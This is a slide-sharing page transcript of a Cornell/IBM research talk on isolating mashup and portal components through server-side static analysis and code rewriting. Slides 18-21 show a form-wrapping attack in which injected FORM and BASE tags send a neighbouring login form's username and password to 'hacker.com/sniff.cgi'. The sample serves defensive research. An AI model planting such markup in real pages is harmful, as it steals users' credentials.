1 / 28

Mashup Component Isolation via Server-Side Analysis and Instrumentation

Mashup Component Isolation via Server-Side Analysis and Instrumentation. K. Vikram / Cornell University Michael Steiner/ IBM T.J. Watson Research Center. Ways of Interference. JavaScript DOM objects & events, library and runtime objects, … HTML Split/wrap attack, <BASE>, … Credentials

rhonda-garcia
Download Presentation

Mashup Component Isolation via Server-Side Analysis and Instrumentation

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Mashup Component Isolation via Server-Side Analysis and Instrumentation K. Vikram / Cornell University Michael Steiner/ IBM T.J. Watson Research Center

  2. Ways of Interference .. • JavaScript • DOM objects & events, library and runtime objects, … • HTML • Split/wrap attack, <BASE>, … • Credentials • CSRF, … • UI • Phishing ….

  3. Needed: Isolation • Isolated & authentifiable component as foundation • Fine-granular • Same-origin does not really cut it …. • Isolate & hide • DOM sub tree • JS sub-namespace & browser resources (cookies) • Limited component-authenticated back-end communication • Data-services only • Component-to-component communication built on top • Async & restricted type (JSON) • Information-hiding useful for aspects other than security …

  4. c2 Mashup Server Aggregator Browser c1 HTTP U1 c2 c1 Our Approach

  5. c2 Mashup Server Rewriter Static Analyzer Tagger Aggregator Browser c1 HTTP U1 c2 c1 Unmodified Our Approach

  6. Close-up on Tagger • Checks syntactic constraints on HTML • Checks well-formedness of Javascript • Wraps up markup within a DIV element, call it root(domain) • Marks component domain boundaries

  7. Close-up on Analyzer • Models the HTML as Javascript objects • Model host objects and library code as global Javascript objects with their own domain • Uses the IBM CAPA/DOMO framework for static analysis • Produces a call graph, with SSA instructions

  8. Close-up on Analyzer • Restricting Tree-Walking • Maintaining HTML consistency invariants • Maintaining Integrity of Data/Code I  CG.[y = x.parentNode] PS(y)  PS(root(domain(this)).parentNode) =  I  CG.[ x.insertChild(y) ] isValidChild(y,x) I  CG.[ y := x ]  domain(y)  domain(x) Component 2 CG: Call Graph PS(x): Points-to Set of x domain(x): domain in which x was defined isValidChild(y,x): true iff y is allowed to be a child of x by the HTML DTD Component 1 Component 3 Analysis System Information Flow Lattice for Integrity

  9. Close-up on Rewriter • Namespace isolation • using unique prefixes and rewriting • Statically undecidable steps • E.g. Tree-walking • Component credentials • for back-end communication • Rewriting system objects to local images • document to root(context(this))

  10. Challenges • Restricted Programming Model • Banned: eval & friends; modification of system objects; flash, java, … • No ``real’’ limitation in expressitivity … • … but • standards go in opposite direction? against ``nature’’? While mostly good convenient programming practice, sometimes very inconvenient! • tool/framework support needed! • Tamper-resistance • Browser evolution, extensions, proxy/server, … • Usual arms race? • Performance Considerations • Analysis of generating code (JSP) • Certification/proof-carrying code • Safe higher-level programming language, e.g., GWT meets SIF?

  11. Related Work • JavaScript security: • Anupam et al, UXSEC’98 & USITS’99. • Static analysis/rewriting • JavaScript: Reis et al, OSDI’06; Yu et al, POPL’07. • Lots of work for other language & environment (e.g., IRM for Java, Singularity on OS level, …) • Browser modifications • Jim et al, WWW’07; Erlingsson et al, HotOS’07. • Vogt et al, NDSS’07. • Multi-domain Browser-OS: Cox et al, S&P 2006.

  12. BACKUP

  13. Outline • Abstract Model • The Browser • DOM + JavaScript • Classes of Attacks • Solution Scheme • The Tagger/Analyzer/Rewriter • Conclusions

  14. More about Portals Other Server Other page Browser U2 P2 P2 P1 JSR/WSRP Portal Server Browser P1 HTTP U1 P2 P1

  15. Current State of Security Other Server Browser U2 P2 P2 P1 Portal Server Browser P1 U1 P2 P1

  16. Current State of Security Same Origin Other Server Authentication and Roles Browser U2 P2 P2 P1 SSL Portal Server Browser P1 U1 P2 P1

  17. Current State of Security Same Origin Other Server Authentication and Roles Browser U2 P2 P2 P1 SSL Portal Server Browser P1 U1 P2 P1

  18. Simple Attacks <FORM method="post" action=“http://hacker.com/sniff.cgi”> <BASE href=“http://hacker.com”> P2 <FORM method="post" action=“login-submit.cgi"> <P>Username: <INPUT type="text" name="username" size="20"> <P>Password: <INPUT type="text" name="password" size="20"> <P><INPUT type=“submit” onclick=“check();”><INPUT type="reset"> <SCRIPT>function check() { … } </SCRIPT> </FORM> P1 </FORM> <SCRIPT>function check() { … } </SCRIPT> P2 Portal Markup

  19. Simple Attacks <FORM method="post" action=“http://hacker.com/sniff.cgi”> <BASE href=“http://hacker.com”> P2 <FORM method="post" action=“login-submit.cgi"> <P>Username: <INPUT type="text" name="username" size="20"> <P>Password: <INPUT type="text" name="password" size="20"> <P><INPUT type=“submit” onclick=“check();”><INPUT type="reset"> <SCRIPT>function check() { … } </SCRIPT> </FORM> P1 </FORM> <SCRIPT>function check() { … } </SCRIPT> P2 Portal Markup

  20. Simple Attacks <FORM method="post" action=“http://hacker.com/sniff.cgi”> <BASE href=“http://hacker.com”> P2 <FORM method="post" action=“login-submit.cgi"> <P>Username: <INPUT type="text" name="username" size="20"> <P>Password: <INPUT type="text" name="password" size="20"> <P><INPUT type=“submit” onclick=“check();”><INPUT type="reset"> <SCRIPT>function check() { … } </SCRIPT> </FORM> P1 </FORM> <SCRIPT>function check() { … } </SCRIPT> P2 Portal Markup

  21. Simple Attacks <FORM method="post" action=“http://hacker.com/sniff.cgi”> <BASE href=“http://hacker.com”> P2 <FORM method="post" action=“login-submit.cgi"> <P>Username: <INPUT type="text" name="username" size="20"> <P>Password: <INPUT type="text" name="password" size="20"> <P><INPUT type=“submit” onclick=“check();”><INPUT type="reset"> <SCRIPT>function check() { … } </SCRIPT> </FORM> P1 </FORM> <SCRIPT>function check() { … } </SCRIPT> P2 Portal Markup

  22. Our Model Browser U2 P2 P2 P1 Portal Server Browser P1 U1 P2 P1

  23. Portlet Isolation P2 Portal Server Isolation Boundary Browser P1 U1 P2 P1

  24. The Ubiquitous Browser var now=new Date,t1=0; t1=now.getTime(); this.agt = navigator.userAgent.toLowerCase(); this.ie = (this.agt.indexOf("msie") != -1); if(this.ie) { document.write("<p>Sorry, we do not support Internet Explorer"); document.close(); } else { document.write("<p>We applaud your taste in browsers!"); } • JavaScript • Weakly typed • Prototype based • Dynamically modifiable var counter=2; function sub(fm) { var qstring = document.f.name1.value + " " + document.f.conf1.value + " restaurant "; document.f.q.value = qstring; var then = new Date; alert("You took " + ((then.getTime()-t1)/1000) + " seconds to submit your preferences."); return 1; } function createLinkElem(target, str) { var moveElem = document.createElement("TD"); moveElem.appendChild(createLink(target, str)); return moveElem; } P1 Browser function createLink(target,str) { var fnt = document.createElement("FONT"); fnt.setAttribute("size","-1"); fnt.appendChild(document.createTextNode(str)); var lnk = document.createElement("A"); lnk.setAttribute("href","#"); lnk.setAttribute("onclick",target); alert("set" + lnk.onclick); lnk.appendChild(fnt); return lnk; } P2 P2 P1

  25. Lookup node/ Read information The Ubiquitous Browser Isolation Domain Restructure document var now=new Date,t1=0; t1=now.getTime(); this.agt = navigator.userAgent.toLowerCase(); this.ie = (this.agt.indexOf("msie") != -1); if(this.ie) { document.write("<p>Sorry, we do not support Internet Explorer"); document.close(); } else { document.write("<p>We applaud your taste in browsers!"); } Modify node/ attributes var counter=2; function sub(fm) { var qstring = document.f.name1.value + " " + document.f.conf1.value + " restaurant "; document.f.q.value = qstring; var then = new Date; alert("You took " + ((then.getTime()-t1)/1000) + " seconds to submit your preferences."); return 1; } function createLinkElem(target, str) { var moveElem = document.createElement("TD"); moveElem.appendChild(createLink(target, str)); return moveElem; } P1 P1 Browser function createLink(target,str) { var fnt = document.createElement("FONT"); fnt.setAttribute("size","-1"); fnt.appendChild(document.createTextNode(str)); var lnk = document.createElement("A"); lnk.setAttribute("href","#"); lnk.setAttribute("onclick",target); alert("set" + lnk.onclick); lnk.appendChild(fnt); return lnk; } P2 Create and add nodes P2 P1 P2 DOM Interface DOM (Document Object Model)

  26. Taxonomy of Attacks • Underspecified Semantics • FORM Wrapping, BASE, … • Shared Runtime • Language: Prototypes, namespace • Libraries: Math, String, … • Shared DOM Tree • Walk the tree, names, … • Event Space • Access keys, Tab Index • Shared Host • Environment Objects: Navigator, location, window, top, history • Layout Engine: STYLE, Absolute lengths, … • Cookies • Shared Portal Markup Code (HTML + JS) • Utility functions

More Related